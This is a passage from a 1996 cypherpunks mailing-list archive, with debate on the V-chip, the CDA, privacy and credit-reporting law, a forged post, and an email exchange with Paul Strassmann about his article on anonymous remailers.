    Please take me apart on your mailing list.
Thanks, Jack.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 9 Feb 1996 22:35:46 +0800
To: avatar@mindspring.com
Subject: Re: Tell me whats wrong with this
In-Reply-To: <199602090054.TAA03816@borg.mindspring.com>
Message-ID: <9602091410.AA04159@alpha>
MIME-Version: 1.0
Content-Type: text/plain


avatar@mindspring.com writes:
 > > >         Tell me why parents should not be able to censor their OWN
 > > > television so that they may raise their children the way THEY see
 > > > fit
 > >
 > >But what about *my* TV?  Why should I be forced to pay for something I
 > >don't want just because you want it for yourself?  [ Why does this
 > >seem so obvious? 
 > 
 > You probably had no problem with seat belts being manditory eqiupment ,
 > because they  protected YOU and the people YOU cared about. 

Incorrect.  I do have a problem with that.

 > You probably had no problem with manditory airbags, public building smoke
 > alarms, unleaded fuel, restaurant health codes,etc....Because they
 > protected you and or people you care about, even though they cost
 > YOU more money. 

I'm trying to see what this has to do with a mandatory chip in my
TV...  SOmehow the link between that and a smoke alarm seems tenuous
at best.

The intent of making the V chip (what does "V" stand for anyway?
"Violence?" Eerily Orwellian if so...) mandatory seems to be that it's
necessary to "protect" the people who want to "protect" their children
but are too stupid to seek out and purchase a TV equipped with an
optional filtering device.   "Oh darn; I want to protect my children
from all this horrible damaging programming, but I bought the wrong
kind of TV!  If only the government had made it impossible for me to
do so!"

 > Besides, we both no that the cost of the chip is
 > insignificant. This device hurts no one!
 > Charles Donald Smith Jr.
 > 
 > ||The government  is my shepherd I need not work. It alloweth me to lie
 >  down on a good job. It leadeth me beside stilled factories. It
 >  destroyeth  my initiative...

Could you please change your signature block?  My hypocrisy meter is
pegged. 

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Fri, 9 Feb 1996 21:33:51 +0800
To: cypherpunks@toad.com
Subject: Re: "Plonk"
Message-ID: <2.2.32.19960209131356.006c5e08@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 08/02/96 -0600, Ed Carp wrote:
>
>Because Perry has an ego bigger than Bill Clinton, Newt Gingrich, and
>Dianne Feinstein all rolled into one, that's why. 

<Excessive .sig deleted>

This from a guy whose signature is 12 times the length of the message that
it was attached to?
Puh-lease....

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 10 Feb 1996 18:23:46 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Need a "warning" graphic of some kind for CDA
In-Reply-To: <199602090618.WAA24316@ix13.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960209080902.4644A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


This post rated SB for Southern Babe. My credit rated NC-17.

On Thu, 8 Feb 1996, Bill Stewart wrote:

>         Before Bill Clinton signed the Exon Internet Censorship Bill,
>                 Tipper Gore brought you Music Censorship.
>         Uncle Frank says "<quote here>"

No she didn't! She brought us voluntary labelling, which is completely 
different. Some local governments have then tried to use those labels to 
commit censorship, but that's illegal. Ms. Gore's attitude is and always 
has been that parents should be responsible.

 Exon's CDA (Chicks, Dicks, and Arseholes) is different because it
restricts content by law, including material protected by the first 
ammendment.

 The Administration has repeatedly stated its belief that those parts of 
the bill are unconsitutional, and does not intend to enforce them. 
Unfortunately, because the rider was attached to such an incredibly 
corporately popular bill, it would have been politically impossible to 
veto it for this, epecially since they believe that the courts will throw 
out the (ir)relevant parts. These corporate interests in getting the bill 
past also make's those who did vote against the bill in the house and 
senate especially deserving of praise; they won't be getting many 
Telebucks this year. maybe CypherPAC can reward them? 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 10 Feb 1996 01:14:09 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602091642.IAA19346@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain




>On Thu, 8 Feb 1996 jamesd@echeque.com wrote:
>> A law "protecting" privacy would require government supervision 
>> of what is on my computer and your computer.  

At 09:21 AM 2/9/96 -0500, Tim Philp wrote:
>	Private individuals are not what I was refering to.    I am more
> concerned about corporations

First:  You will not get that, because governments invariably privilege large 
businesses above small businesses and individuals. and invariably privilege 
old established businesses against new businesses.

Secondly if you were able to get that, it would be even worse than the what 
you will actually get.

If you have one law for men who run businesses and one law other folks, 
then we have selective enforcement and application of the laws, 
that enables governments to act selectively and capriciously.   
For example here in California private citizens who attempt to organize 
recall elections are often subject to extraordinary and confiscatory fines.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 9 Feb 1996 21:05:27 +0800
To: cypherpunks@toad.com
Subject: New Internet Privacy Provider - Press Release
Message-ID: <Pine.LNX.3.91.960209084435.1000A-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




PRESS RELEASE:  2/9/96  Anguilla, Offshore Information Services Ltd.

As a result of recent efforts to censor the Internet in France, Germany,
China, and now the USA, Offshore Information Services Ltd. (OIS)
anticipates a larger market for privacy services over the Internet. OIS is
well suited to provide such service since it is located in Anguilla, a
taxhaven in the Caribbean with strict secrecy laws.  OIS is now entering
this market. 

OIS makes it easy for users to setup an online identity offshore. Setting
up an offshore email identity can be as easy as changing the POP server
name, user name, and password in their mail program.  Using this new
idendity they can again have free-speech on the Internet.

If users choose, they can login to a machine in Anguilla using ssh so that
their communication over the Internet is encrypted. 

Users can also maintain web pages offshore almost as easily as if they
were onshore. 

Anguilla has no restrictions on publications about dead presidents of
France, or information about birth control, etc.

The OIS web page is http://online.offshore.com.ai/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 9 Feb 1996 22:13:04 +0800
To: cypherpunks@toad.com
Subject: [NOISE] #/%age of CDA-blackened sites
Message-ID: <199602091349.IAA02800@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sorry to post this question here, but I know of no other group with
folks who would know. Have any of the "spiders" such as Alta Vista
been sent to see just how many US sites have been blackened in the
protest? The approximate number and percentage of US sites blackened
might be interesting. In my limited surfing, I have been gratified
to see the _widespread_ response -- but I am not the typical user.
JMR

Regards, Jim Ray  --  <liberty@gate.net>  

Boycott espionage-enabled software! http://www.shopmiami.com/prs/jimray
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  --  IANAL
_______________________________________________________________________

 "In wise hands, poison is medicine.
  In foolish hands, medicine is poison." -- Cassanova


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMRtQhW1lp8bpvW01AQGxaAP+LJ/C88WfFv4NzPY8jZ8JcguHk2p+knbA
lp/ZW76u6U3JUPRG0qT12nF4yLzrKLL3+N4osiJvpREbuqC2YMAEg2NNJhC2e+RQ
Nepe8QzU/KGuHj3Fge5Tc+Uyvaq4rzcuXMSSlemHNdlIm3JroVQ68Iebswcknjqh
4ZI3J5Cgq3o=
=RYeD
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 10 Feb 1996 02:10:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: LAST REMINDER
Message-ID: <Pine.SUN.3.91.960209090153.21410A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I have 100+ confirmations for my party tomorrow.  It's still not
too late, though, to RSVP (or even show up without doing so if
you have a good excuse).  E-mail me or leave a message on my
answering machine (510-839-3441).

If you've misplaced the URL for the invitation (duh), it is:

		http://www.c2.org/party/masquerade.html

If you miss the party (you'll regret it), there will be pictures
on the above Web site sometime next week.


 S a n d y

P.S.	Among the guests will be a Cypherpunk who is
	flying in from out of state.  Another guest will
	be an absolute stranger who had an ad in the
	personals.  One guest is a movie star.  Of course,
	many Cypherpunk luminaries will be in attendance.
	There will be a significant 2nd Amendment presence.
	Be there, or be square.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 9 Feb 1996 22:37:11 +0800
To: jamesd@echeque.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <199602090726.XAA27422@blob.best.net>
Message-ID: <Pine.OSF.3.91.960209091108.19343D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 8 Feb 1996 jamesd@echeque.com wrote:

> 
> On Mon, 5 Feb 1996, Duncan Frissell wrote:
> >> Unfortunately, [a privacy act] would also:
> >> 
> >> *  Require government registration of computers and databases containing
> >> information about people (whether these computers are used by business or
> >> individuals).  This eases regulation of computers and future confiscation.
> 
> At 07:04 PM 2/5/96 -0500, Tim Philp wrote:
> >I don't believe that this follows at all. All that would be required 
> >would be a statutory obligation to comply with the legislation.
> 
> And how can you enforce this statutory obligation?  Privacy laws 
> against private citizens run into the same problem as drug laws:  
> You need intrusive means to enforce them.
> 
> A law "protecting" privacy would require government supervision 
> of what is on my computer and your computer.  
> 

	Private individuals are not what I was refering to. I am more
concerned about corporations who hold information about me and release it
to the highest bidder. When it comes to individual versus corporate
rights, I am clearly on the side of the individual. 
	It is not unreasonable to expect corporations to comply with 
environmental laws to prevent the poisoning of our air and water. I 
think that it is also not unreasonable to expect that personal 
information that we have to release to participate in society be held in 
secure trust and be used only for the purposes that we released it in the 
first place.
	I have also not suggested some form of prior restraint that would 
require government access to computers. I simply suggest that should a 
violation occur, that I have the right of civil and criminal law as a 
recourse to both compensate me for my loss of privacy as well as deter 
future damage. A company knowing that civil and criminal penalties could 
result from a violation would take extra care to ensure the security of 
my data.
Regards,
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 9 Feb 1996 18:12:11 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: violating politicians privacy
In-Reply-To: <199602090618.WAA24333@ix13.ix.netcom.com>
Message-ID: <Pine.BSD.3.91.960209094742.1059A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Feb 1996, Bill Stewart wrote:

> attila said:
>
> >	well, I take it as assumed correct that illegally violating the
> >    credit and personal information of member os Congress (might as well 
> >    include the Clintons and the Gores) would get a response on privacy.
> 
> _Is_ it violating their privacy to get their credit information?
> After all, they're applying for some mighty big loans from everybody,
> and putting everybody who pays US taxes down as a credit reference....
>
    attila writes: 

        well, remember, Congress has a prime function that their "duty" 
    is to legislate a bunch of laws for _us_ to live buy; and, that being 
    done, to legislate a second set of laws, more to their liking, for
    _them_ to live by and collect $5M pensions, and 100% health coverage
    at the very best for the rest of their lifes. 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 9 Feb 1996 23:22:13 +0800
To: bplib@wat.hookup.net (Tim Philp)
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <Pine.OSF.3.91.960209091108.19343D-100000@nic.wat.hookup.net>
Message-ID: <199602091453.JAA17982@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim Philp writes:

> On Thu, 8 Feb 1996 jamesd@echeque.com wrote:

> > A law "protecting" privacy would require government supervision 
> > of what is on my computer and your computer.  

> 	Private individuals are not what I was refering to. I am more
> concerned about corporations who hold information about me and release it
> to the highest bidder. When it comes to individual versus corporate
> rights, I am clearly on the side of the individual. 

So, I take it you have no problems with me as a private individual
selling information about you to the highest bidder so long as I don't
file letters of incorporation?  This is a silly distinction.

But more to the point: The word corporate does not necessarily denote a
huge company with millions of dollars in revenue, thousands of employees
and stock publicly traded on the NYSE.  Most "corporations" are small
companies, one or two or a few employees.  Every time the government-as-
nanny types come up with a new law "to protect us from the evil
corporations", every company big and small is saddled with additional
costs and hassles.  This means dollars to you and me, either directly --
because you're an owner or employee of the company -- or indirectly --
because the price of goods sold increases.  Why is this so hard to grasp?


>                                                                   I 
> think that it is also not unreasonable to expect that personal 
> information that we have to release to participate in society be held in 
> secure trust and be used only for the purposes that we released it in the 
> first place.

Yes, it *IS* unreasonable as applied to information.  If you don't want
an individual or company to have information about you, don't give it
to them.  Pay cash for your purchases.  Or make them (contractually)
agree not to release the information.  Sure, it may cost you extra
dollars, and sometimes they may not be willing, so you'll have to take
your business elsewhere or live with the realization that you're trading
convenience (and other benefits) for privacy.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Fri, 9 Feb 1996 23:48:57 +0800
To: cypherpunks@toad.com
Subject: Benefits of the V-Chip
Message-ID: <v01540b05ad4112e76cbb@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain



There is one potential side-benefit to the V-chip -- The inverse-V-chip
(the idea for which I stole from someone on this list, sorry I don't
remember who to credit).

I am looking forward to a time when I will never, even accidentally, have
my TV tuned to "Full House" ;-)

        Clay


        READ THIS NOW:http://www.newshare.com/Reporter/today.html
(warning: just thinking about this URL puts you in violation of the CDA of 1996)

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 10 Feb 1996 23:09:56 +0800
To: cypherpunks@toad.com
Subject: Re: PLONK
Message-ID: <199602090228.KAA05732@infolink2.infolink.net>
MIME-Version: 1.0
Content-Type: text/plain


Plonking is an outrageous abuse of net courtesy.
Shame on you!
 
David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Sat, 10 Feb 1996 03:11:55 +0800
To: cypherpunks@toad.com
Subject: Regarding employee rights on company equipment
Message-ID: <v01530500ad41411abb22@[204.179.169.46]>
MIME-Version: 1.0
Content-Type: text/plain


A day or so ago, I reasoned incorrectly that university students and
employees were free to encrypt mail they sent through their student or work
accounts.  This was in response to a statement that the govt could retain
at least some control of internet traffic through the universities and
businesses.  I would credit the person who called me on it, by I do not
remember who it was.  It seems that, at least for employees, it is totally
up to the employer:

>From Edupage Feb 8, 1996,

INTERNET USAGE POLICIES
Neal J. Friedman, a specialist in online computer law, says that "employees
are under the misapprehension that the First Amendment applies in the
workplace --  it doesn't.  Employees need to know they have no right of
privacy and no right of free speech using company resources."  According to
Computerworld, a number of employers are adopting Internet usage polcies,
such as one developed at Florida Atlantic University: <
http://www.fau.edu/rinaldi/net/netpol.txt > (Computerworld 5 Feb 96 p55)

It's still to bad that I was wrong :-(, but such is life.

lunaslide

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

Digitally sign your mail too!
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david@sternlight.com (David Sternlight)
Date: Sat, 10 Feb 1996 03:15:44 +0800
To: cypherpunks@toad.com
Subject: Forgery--wasUnknown address
Message-ID: <v02140b01ad4144d35469@[204.31.253.139]>
MIME-Version: 1.0
Content-Type: text/plain


I send this to you for your amusement and delectation. The core message
below, about plonking, is a crude forgery--I did not write it nor did I
send it.

David

>From: postmaster@warehouse.mn.org (Postmaster)
>Subject: Unknown address
>Date: Fri,  9 Feb 1996 09:32:32 GMT
>Organization: The Warehouse BBS
>To: david@sternlight.com
>
>The user this message was addressed to does not exist at this site.  Please
>verify the name and domain in the original message that follows.
>Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
>
>                     ----- Original Message follows -----
>
>From: David Sternlight <david@sternlight.com>
>To: cypherpunks@toad.com
>Date: Fri, 9 Feb 1996 10:28:00 +0800
>Subject: Re: PLONK
>
>Plonking is an outrageous abuse of net courtesy.
>Shame on you!
>
>David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david@sternlight.com (David Sternlight)
Date: Sat, 10 Feb 1996 03:23:29 +0800
To: cypherpunks@toad.com
Subject: Forgery
Message-ID: <v02140b02ad4145336b20@[204.31.253.135]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just sent you a message, forwarding a forged message attributed to me about
plonking. It strikes me that to reduce the possibility that some might
claim THAT message was a forgery, I might have signed it. Too late. Well,
I'll sign this one.

Best;
David

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: MacPGPv262

iQCVAwUBMRuVP0wgH+NYrQ81AQHXAQP+NYB6xyO24vDDJORyp1PhN9ax0oorgkQu
lCUKZ/G5lrCUnrDMTksy4RqA3N1401QKQGAGWmwlVESWNrMoUP1kjFX8orKZej+/
MHefCtRuh4FB6VmAWeC769Mhza0m02Fu7//R+o95em60wUk0z0O0f5KUe85V3T3T
aRV47lmDQjg=
=w/Nv
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sun, 11 Feb 1996 06:20:05 +0800
To: cypherpunks@toad.com
Subject: a chat w/ Paul Strassman about his remailer article
Message-ID: <v02120d03ad3f232e2860@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Now I have a firmer grasp on the dynamics of escalation. ;)
        A couple of notes. (1) The people Mr. Strassman CCed in his first
response remained CCed throughout; one of them is his co-author, William
Marlow (Senior Vice President, Science Applications International
Corporation [SAIC]). (2) He hasn't responded to my last mail, and probably
won't, at least in private; obviously, he's free to respond to it on
Cypherpunks. (3) I find his claims to understand and properly represent the
arguments for remailers to be, er, lacking: claims like "remailing
capabilities are operated [...] as a public service, almost always at no
charge because it costs so little to set one up," the absence of the
standard penet-type arguments--about support-group discussion re sexual
abuse etc.--speak for themselves, imo.
        Anyway:


>To: paul@strassmann.com (Paul A. Strassmann)
>From: tbyfield@panix.com (t byfield)
>Subject: Re: your article on remailers
>
>Greetings.
>        Your article on remailers <http://www.strassmann.com/pubs/
>anon-remail.html> was fascinating.
>        The "connection" you draw between disease and techniques of
>anonymity is arbitrary and tendentious: in place of a careful, sustained
>analysis of anonymous remailers _as such_, your article relies on a
>bizarre rhetorical substitution of disease for anonymity--"Information
>terrorism poses a threat; anonymity prevents punishment; the fact that
>legislative and policy bodies aren't dealing with the issue reminds me of
>the history of public medicine; therefore anonymity is a disease like
>AIDS; Russian criminals are using remailers; this is how remailers
>work..." This isn't an argument--it's a hodgepodge of free-associations
>and very peculiar allegations. What evidence is there that "the Russian
>(ex-KGB) criminal element" (whatever that is) constitutes a *statistically
>significant* segment of remailer-users? If they aren't statisticaly
>significant, why mention them? In the absence of any specific evidence, I
>can only assume that this claim is pure fantasy--like the confusing
>association between "AIDS" and "terrorism." Certainly, both are bad for
>society, but so are many other things--littering, starvation, and poor
>workmanship.
>        If you plan to develop your work on remailers further and present
>it to governmental agencies and NGOs, please take the time to *understand*
>the arguments of remailer advocates, rather than merely quoting them at
>length. You'll be doing yourself a favor--because, really, the only
>sections of your article that seem to make much sense are the quotations
>from people who develop and maintain remailers.
>
>Ted Byfield
 <address>

-----------------------------
>X-Sender: pas@pop.connix.com
>Mime-Version: 1.0
>Date: Wed, 7 Feb 1996 10:31:10 -0500
>To: tbyfield@panix.com (t byfield)
>From: paul@strassmann.com (Paul A. Strassmann)
>Subject: Re: your article on remailers
>Cc: "William Marlow" <William_Marlow@cpqm.saic.com>,
>        "Tim Leshan" <LESHAN@ksgrsch.harvard.edu>,
>        BRIAN KAHIN <KAHIN@HULAW1.HARVARD.EDU>
>
> Dear Mr. Byfield:
>
>Thanks for your comments about our remailer paper. I believe a few points
>are in order in response to your observations:
>
>1. It does not seem that you have finished reading the paper. There is a
>long section in the end captioned <Why Remailers?> which summarizes a wide
>spectrum of opinions and beliefs of those who develop and offer remailer
>services. I am satisfied that I have represented fairly the views of those
>who see in remailers the defense of privacy and civil liberties. I also
>conclude that remailers are here to stay.
>
>2. With regard to the evidence of that remailers are used by the criminal
>element, and particularly by the Russian (ex-KGB), I am satisfied with the
>evidence I have seen so far. As court proceedings become unsealed, everyone
>will have an opportunity to examine that evidence. Meanwhile, you may wish
>to browse for recent stories with the keywords <Citicorp> and <Cybercrime>
>for such disclosures.
>
>3. In your letter you employ a technique which is not appropriate for the
>conduct of a civilized discourse. You start by  attributing to me
>statements which I did not make. Then, you proceed to debunk them. Let me
>illustrate:
>
>I did not use the expression "statistically significant" in describing the
>use of remailers by the criminal element. Therefore, your argument "...if
>they aren't statistically significant why mention them?" is both false as
>well as logically inconsistent.
>
>Your debating style shows similar flaws by avoiding facts and arguing your
>own constructs of what you attribute as my views. It is only because of the
>importance of this subject matter that I have decided to respond to your
>"flame".
>
>Sincerely,
>
>Paul Strassmann
 <full quote of my email omitted>

---------------------------------------------
>To: paul@strassmann.com (Paul A. Strassmann)
>From: tbyfield@panix.com (t byfield)
>Subject: Re: your article on remailers
>
>At 10:31 AM 2/7/96, Paul A. Strassmann wrote:
>
>Mr. Strassmann--
>        Since you may not wish to pursue any further discussion with
>someone you don't know, I'll cut to the chase: may I submit your response
>(unabridged) to the Cypherpunks mailing list? I notice that you've CCed my
>mail to three people unknown to me without my permission. (Hi,
>everyone...)
>        Here are a few further remarks, if you're interested; I hope you are.
>I've reproduced your remarks out of their original order for purposes of
>brevity.
>
>>3. In your letter you employ a technique which is not appropriate for the
>>conduct of a civilized discourse. You start by  attributing to me
>>statements which I did not make. Then, you proceed to debunk them. Let me
>>illustrate:
>
>        You are, I trust, familiar with the phenomenon commonly called
>"asking a question"? That is what I did when I asked you whether Russian
>criminal elements constitute a statistically significant segment of
>remailer users: I asked you a question. This process can sometimes be
>confusing--for example, when the criteria that questioner and questionee
>judge to be important differ. I feel that, in matters of public policy,
>relative numbers are important: thus, if tens or hundreds of thousands of
>people use remailers for benign purposes while only a handful of Russian
>criminals do so for nefarious purposes, then public policy decisions on
>remailers should not be founded primarily on the latter fact. By analogy,
>it seems likely that someone, somewhere, has taught a monkey to drive a
>car--there might even be a documented instance of it; should we then take
>this into consideration in debating national automotive policy? After all,
>if it weren't illegalized, the chaos that could be caused by pet
>chimpanzees tooling around on public roads can't be understated...
>        Obviously, you're free to differ on the subject of relative
>numbers and their bearing on policy, just as you're free to persevere
>under the belief that a question can be "false."
>        I can't, however, resist pointing out that asking c[are]fully
>worded questions that conform to established scientific criteria is
>considered "appropriate for the conduct of a civilized discourse." Again,
>you're free to disagree, of course. [brackets in 1st line = spelling
>correction]
>
>>2. With regard to the evidence of that remailers are used by the criminal
>>element, and particularly by the Russian (ex-KGB), I am satisfied with the
>>evidence I have seen so far. As court proceedings become unsealed, everyone
>>will have an opportunity to examine that evidence. Meanwhile, you may wish
>>to browse for recent stories with the keywords <Citicorp> and <Cybercrime>
>>for such disclosures.
>
>        "If you knew what I knew" arguments have needlessly become a
>staple of the national security establishment; but in all but the rarest
>instances are they a valid basis for policy decisions. I understand full
>well that the Russian "mafia" and former apparatchiks throughout the
>former Soviet bloc are serious problems that we ignore only at our peril;
>and, also, that invoking them increases one's chance of funding in the
>security establishment. But I also understand that certain segments of the
>USG would ultimately be better off distinguishing between its citizenry
>and the Russian mob, rather than continually invoking the latter in
>advocating legislation that pertains primarily to the former.
>
>        In any case, I cannot wish you well in your endeavors in this
>regard, since I disagree with most of what you say; I can, however, wish
>you well in other regards, and I do.
>        Please take a moment to answer my original question regarding the
>Cypherpunks mailing list.
>
>Regards,
>
>Ted Byfield
 <address>

-----------------------------
>X-Sender: pas@pop.connix.com
>Mime-Version: 1.0
>Date: Wed, 7 Feb 1996 22:00:05 -0500
>To: tbyfield@panix.com (t byfield)
>From: paul@strassmann.com (Paul A. Strassmann)
>Subject: Re: your article on remailers
>Cc: "William Marlow" <William_Marlow@cpqm.saic.com>,
>        "Tim Leshan" <LESHAN@ksgrsch.harvard.edu>,
>        BRIAN KAHIN <KAHIN@HULAW1.HARVARD.EDU>
>
>I have no problem with your posting my messages. Thanks for asking except
>you should do so only after you include the text of all messages, including
>this one.
>
>You have totally  misunderstood my response to your points about the
>relevance of whether ex-KGB criminals ( or monkeys)  are a statistically
>significant number. The problem with your communications has been that you
>have continued to disregard my conclusions where I stated that anonymous
>remailers are here to stay for good reasons. Whether the number of abusers
>is or is not statistically significant has therefore no bearing on our
>exchanges. For that reason I did not read your text at all as "asking a
>question", but as your own assertion. This makes it unacceptable as an
>argument.
>
>I disagree with  your assertion that you have "...asked a carefully worded
> questions that conform to established scientific criteria." My experience
> as editor of several scientific journals prevents me from acknowledging
> your messages as conforming to any scientific criteria. You have
> selectively picked arguments from the front of my paper, while totally
> disregarding what I said at the end. What you have is not scientific, but
> extractions to support  your arguments.
>
>You are using inference (such as "chance of funding the security
>establishment", "advocating legislation" etc.) for attributing to me what
>you see as reprehensible views. You do that by saying that I have used the
>"if you knew what I knew" arguments as a cover. Again, you are exhibiting a
>debating technique where you assign to me a position I have not taken and
>then proceed to argue against it.
>
>Let me repeat again, your allegation that I have not taken into
>consideration the arguments of remailer advocates is not only  false but
>totally misleading. If you would  bother to read the entire paper, you
>would  find that the  views or remailer advocates are not only represented,
>but found to be of sufficient weight and importance to warrant my
>conclusion that anonymous remailers are here to stay. I also say  that in a
>democratic society it "...becomes politically unacceptable  to designate
>remailers as a potential source of criminal actions. Such absolute
>prohibitions would never pass through a legislative process in a free
>society."
>
>If you are looking for some totalitarian monster, you better look somewhere
>else to vent your apprehensions.
>
>Paul
 <full quote of my second message omitted>
------------------------------------------

>To: paul@strassmann.com (Paul A. Strassmann)
>From: tbyfield@panix.com (t byfield)
>Subject: Re: your article on remailers
>
>>You have totally  misunderstood my response to your points about the
>>relevance of whether ex-KGB criminals ( or monkeys)  are a statistically
>>significant number. The problem with your communications has been that you
>>have continued to disregard my conclusions where I stated that anonymous
>>remailers are here to stay for good reasons. Whether the number of abusers
>>is or is not statistically significant has therefore no bearing on our
>>exchanges. For that reason I did not read your text at all as "asking a
>>question", but as your own assertion. This makes it unacceptable as an
>>argument.
>
>        You seem quite adamant that your repeated assertion that
>"remailers are here to stay" somehow serves to stave off any criticism (or
>at least any criticism from your struly) of your article. I read your
>article in its entirety and understood it quite well, and I agree with
>*some* of it--for example, with your conclusion that remailers are here to
>stay. I could just as easily read some lngthy tome full of rubbish whose
>conclusion is that "stuff exists" and agree with its conclusion while
>remaining skeptical about the bulk of the book.
>        I would submit to you that your article would be much improved if
>you edited out this pathological-biological metaphor.
>
>>I disagree with  your assertion that you have "...asked a carefully worded
>> questions that conform to established scientific criteria." My experience
>> as editor of several scientific journals prevents me from acknowledging
>> your messages as conforming to any scientific criteria. You have
>> selectively picked arguments from the front of my paper, while totally
>> disregarding what I said at the end. What you have is not scientific, but
